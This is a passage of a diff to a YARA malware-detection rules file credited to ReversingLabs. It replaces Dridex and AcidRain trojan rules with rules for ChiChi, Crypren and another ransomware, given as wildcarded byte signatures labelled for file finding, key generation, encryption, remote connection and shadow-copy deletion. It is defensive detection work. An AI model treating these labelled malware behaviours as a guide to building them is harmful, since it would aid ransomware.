8D 45 ?? 50 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 50 8D 45 ?? 89 4D ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 6A + ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? C6 45 + ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8B 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F 43 85 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 50 53 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 8B 75 ?? 0F 43 85 ?? ?? + ?? ?? 6A ?? 6A ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 40 8D 8D ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ?? ?? ?? 59 53 FF 75 ?? 8D 8D ?? ?? ?? ?? A3 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 1C 01 E8 ?? ?? + ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 59 8B 75 ?? + 8D 4D ?? C6 45 ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? 89 70 ?? 8B 45 ?? + 89 30 8B 45 ?? 89 70 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 58 50 68 ?? ?? ?? ?? 83 EC ?? 89 + } + $remote_connection_p5 = { + 5D ?? 8B CC FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B F8 6A ?? 58 + FF 35 ?? ?? ?? ?? 85 FF 0F 44 F8 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 5E 6A ?? 68 + ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? + C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8 + ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? + ?? ?? ?? 8D 4D ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 + 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 50 83 C1 ?? E8 ?? ?? + ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ?? + 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ?? + ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 + ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 + ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7 + 45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D + ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D + ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8B F0 6A ?? 58 6A ?? 5F 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? 88 45 ?? 89 5D ?? 89 7D ?? + 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? + 8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 + ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? 89 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 + EC ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? 89 79 ?? 68 ?? ?? ?? ?? 88 19 E8 + } + $encrypt_files_p1 = { + 8B FB 89 5D ?? 89 7D ?? 89 5D ?? 8B 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C6 45 ?? ?? 89 + 45 ?? 3B F0 74 ?? 56 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ?? + 8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ?? ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D + 4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ?? ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 6A + ?? 58 03 F0 3B 75 ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8B B5 ?? ?? ?? ?? + C6 45 ?? ?? 8B 06 89 45 ?? EB ?? 8D 48 ?? 8D 41 ?? 50 51 68 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ?? 8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ?? + ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D 4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ?? + ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 3B C6 75 ?? 8B 75 + ?? EB ?? 83 7E ?? ?? 74 ?? 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 75 ?? 0F 57 C0 68 ?? + ?? ?? ?? 66 0F 13 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 6A ?? 59 99 + F7 F9 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8B + 75 ?? 8B 7D ?? 89 45 ?? 3B D8 74 ?? 83 EC ?? 8B CC 53 83 61 ?? ?? 83 61 ?? ?? E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 03 F8 83 D6 ?? 6A ?? 58 03 D8 3B 5D ?? 75 ?? 0F AC + F7 ?? C1 EE ?? 56 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 8B 35 + ?? ?? ?? ?? EB ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 6A ?? 58 03 F0 3B F7 75 ?? 68 ?? ?? ?? ?? E8 + } + $encrypt_files_p2 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 8D 8D ?? ?? ?? ?? 57 + 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 33 DB 50 8D 45 ?? 89 5D ?? 50 E8 ?? ?? ?? ?? 59 + 59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 6A ?? 89 59 ?? C7 41 + ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? 8A D8 E8 ?? ?? ?? ?? 84 DB 74 ?? 33 DB E9 ?? + ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 + C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? + ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 33 DB 8B CC 89 5D ?? 56 E8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 3B C1 0F 42 C8 3B C7 89 + 4D ?? 0F 42 F8 89 7D ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 39 9D ?? ?? ?? ?? 75 ?? 83 EC ?? 8B CC 56 E8 ?? ?? ?? + ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ?? C6 45 ?? ?? 72 ?? 8B 36 E8 + ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D + ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 77 ?? 56 E8 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ?? + ?? 8B 4D ?? 56 53 51 89 45 ?? E8 ?? ?? ?? ?? 56 53 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? + 83 C4 ?? 89 5D ?? 8B D3 85 C0 0F 84 ?? ?? ?? ?? 8B C8 2B CA 39 4D ?? 8B C1 8B F1 0F + 46 45 ?? 3B F9 89 45 ?? 0F 46 F7 8B 7D ?? 2B CE 89 75 ?? 39 4D ?? 0F 46 4D ?? 89 4D + ?? 85 FF 75 ?? 53 56 FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 0C 3E 8B + } + $encrypt_files_p3 = { + C4 89 4D ?? 89 08 8D 8D ?? ?? ?? ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? E8 + ?? ?? ?? ?? 53 FF 75 ?? 8D 8D ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 + ?? 8D 8D ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 8B D4 8B D8 + 33 C0 03 CF 89 0A 8D 8D ?? ?? ?? ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? E8 + ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 7D ?? 2B 75 ?? 03 + 7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? 56 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 + ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 01 45 ?? 53 E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 8B 84 05 ?? ?? ?? ?? C1 E8 ?? A8 ?? 74 ?? 83 EC ?? + 8B CC FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ?? + C6 45 ?? ?? 72 ?? 8B 36 E8 ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 7D ?? + 89 55 ?? 6A ?? 5B 3B D0 0F 82 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? + E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC + ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? + ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 8B 48 ?? C6 45 ?? ?? 72 ?? + 8B 00 51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? + 8D 45 ?? 0F 43 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 89 59 ?? + 89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? B3 ?? E8 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 8A D8 8D 4D ?? E8 + ?? ?? ?? ?? 8B 4D ?? 8A C3 5F 5E 64 89 0D ?? ?? ?? ?? 5B C9 C3 + } + $find_files = { + 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ?? + 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? + ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? + FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ?? + 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50 + 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 + 89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 + ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA + ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF + 80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 + F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? + ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 + FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? + 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 + 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? + ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B + C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 + ?? E9 } condition: - uint16(0)==0x5A4D and ( all of ($delete_shadow_copies_p*)) and ( all of ($destroy_files_p*)) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -rule REVERSINGLABS_Win32_Trojan_Dridex : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Ransomware_Chichi : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Dridex trojan." + description = "Yara rule that detects ChiChi ransomware." author = "ReversingLabs" - id = "bc68aca1-69e6-57e6-9277-70c89fda1e5d" - date = "2020-09-16" - modified = "2020-09-16" + id = "95062789-a55d-5c1c-a359-206b58f311e5" + date = "2022-02-14" + modified = "2022-02-14" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/trojan/Win32.Trojan.Dridex.yara#L1-L80" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7eddc8f33846dfb61302b7d7fddd8dec59a1bde05b14135c14131a02e2c19600" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.ChiChi.yara#L1-L66" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "863a30e4c708e13ea0f4c6ad42a919de463926508783d6552c0cec746730baa5" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "Dridex" + tc_detection_type = "Ransomware" + tc_detection_name = "ChiChi" tc_detection_factor = 5 importance = 25 strings: - $resolve_api_wrapper_1 = { - 56 57 8B FA 8B F1 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FE ?? ?? ?? ?? 75 ?? 33 C0 5F - 5E C3 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 8B CE E8 ?? - ?? ?? ?? 85 C0 74 ?? 8B D7 ?? ?? ?? ?? E9 - } - $resolve_api_wrapper_2 = { - 57 53 8B FA 8B D9 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FB ?? ?? ?? ?? 74 ?? 8B CB E8 - ?? ?? ?? ?? 85 C0 74 ?? 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3 8B CB E8 ?? ?? ?? ?? 84 - C0 74 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB - } - $resolve_api_wrapper_3 = { - 55 8B EC 57 8B 7D ?? 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 - ?? 56 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? - 85 C0 75 ?? 5E 33 C0 5F 5D C2 ?? ?? 57 50 E8 ?? ?? ?? ?? 5E 5F 5D C2 - } - $resolve_api_wrapper_4 = { - 55 8B EC FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 ?? 56 - E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 85 C0 - 74 ?? 5E 89 45 ?? 5D E9 - } - $find_first_file_snippet_1 = { - 53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? [4-6] BA ?? - ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A ?? 8D 56 ?? - 52 53 51 FF D0 - } - $find_first_file_snippet_2 = { - 57 53 55 8B E9 33 C9 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? - ?? 8B 18 E8 ?? ?? ?? ?? 8B C8 85 C9 74 ?? 33 D2 83 FB ?? 6A ?? 5B 8D 7D ?? 0F 4C DA - 8B C2 53 52 52 57 0F 9D C0 50 FF 75 ?? FF D1 - } - $find_first_file_snippet_3 = { - 53 56 8B F1 33 DB 57 32 C9 89 5E ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B - 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 6A ?? 33 C0 83 FF ?? 59 0F 4C C8 8D 46 ?? 51 53 - 53 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2 + $generate_key = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? + 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 8B 7D ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 85 + FF 75 ?? 33 F6 EB ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 6A ?? 8D 4D ?? C7 45 + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 56 8D + 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C0 74 + ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 03 8B CB 57 56 FF 50 ?? C7 45 ?? ?? ?? ?? ?? 85 F6 + 74 ?? 83 FF ?? 8D 45 ?? 8D 4D ?? 8B FE 0F 46 C8 32 C0 56 8B 09 F3 AA E8 ?? ?? ?? ?? + 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 } - $find_first_file_snippet_4 = { - 53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? 8D 7B ?? 8D - 5F ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A - ?? 8D 56 ?? 52 53 51 CC C3 + $encrypt_files = { + 55 8B EC 51 53 56 57 8B D9 68 ?? ?? ?? ?? 53 89 5D ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? + ?? ?? 53 FF D6 68 ?? ?? ?? ?? 8B F8 FF D6 8B 1D ?? ?? ?? ?? 03 F8 03 FF 83 C7 ?? 57 + 6A ?? FF 35 ?? ?? ?? ?? FF D3 8B F0 85 F6 74 ?? 8B 7D ?? 57 56 FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5B + 8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? + ?? 56 6A ?? FF 35 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B CF E8 ?? ?? + ?? ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 } - $find_first_file_snippet_5 = { - 56 8B F1 32 C9 57 C7 46 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 8B 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 33 C0 B9 ?? ?? ?? ?? 83 FF ?? 0F 4C C8 51 50 - 50 8D 46 ?? 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2 + $find_files = { + 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? + ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF + D7 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 + ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 FF B6 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? FF 74 24 ?? 8B 74 24 ?? + 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ?? + ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 E8 ?? 78 ?? 66 83 + 7C 44 ?? ?? 74 ?? 83 E8 ?? 79 ?? EB ?? 8D 74 24 ?? 8D 34 46 68 ?? ?? ?? ?? 56 FF 15 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 } condition: - uint16(0)==0x5A4D and ( any of ($resolve_api_wrapper_*) and any of ($find_first_file_snippet_*)) + uint16(0)==0x5A4D and ($find_files) and ($generate_key) and ($encrypt_files) } -rule REVERSINGLABS_Linux_Trojan_Acidrain : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Ransomware_Crypren : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects AcidRain trojan." + description = "Yara rule that detects Crypren ransomware." author = "ReversingLabs" - id = "802c7eb7-d407-5b07-a6b4-4648d3ad80e9" - date = "2024-05-10" - modified = "2024-05-10" + id = "9a6ff190-b26b-5b75-9103-95a3b2e80701" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/trojan/Linux.Trojan.AcidRain.yara#L1-L67" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5b47a0de8bda09d217f8a148e561f3da7ce4945f011f4a9b5dbbca88157d3080" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Crypren.yara#L1-L144" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7047d48782762e42544063fde6f2be62eb19f22853ea84abb5bce67c962da172" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "AcidRain" + tc_detection_type = "Ransomware" + tc_detection_name = "Crypren" tc_detection_factor = 5 importance = 25 strings: - $destroy_files_using_ioctls = { - 55 89 E5 57 BF ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 7C 24 ?? 8B 45 ?? 89 04 24 E8 - ?? ?? ?? ?? 85 C0 89 C3 78 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 81 C4 ?? ?? ?? ?? 5B 5E 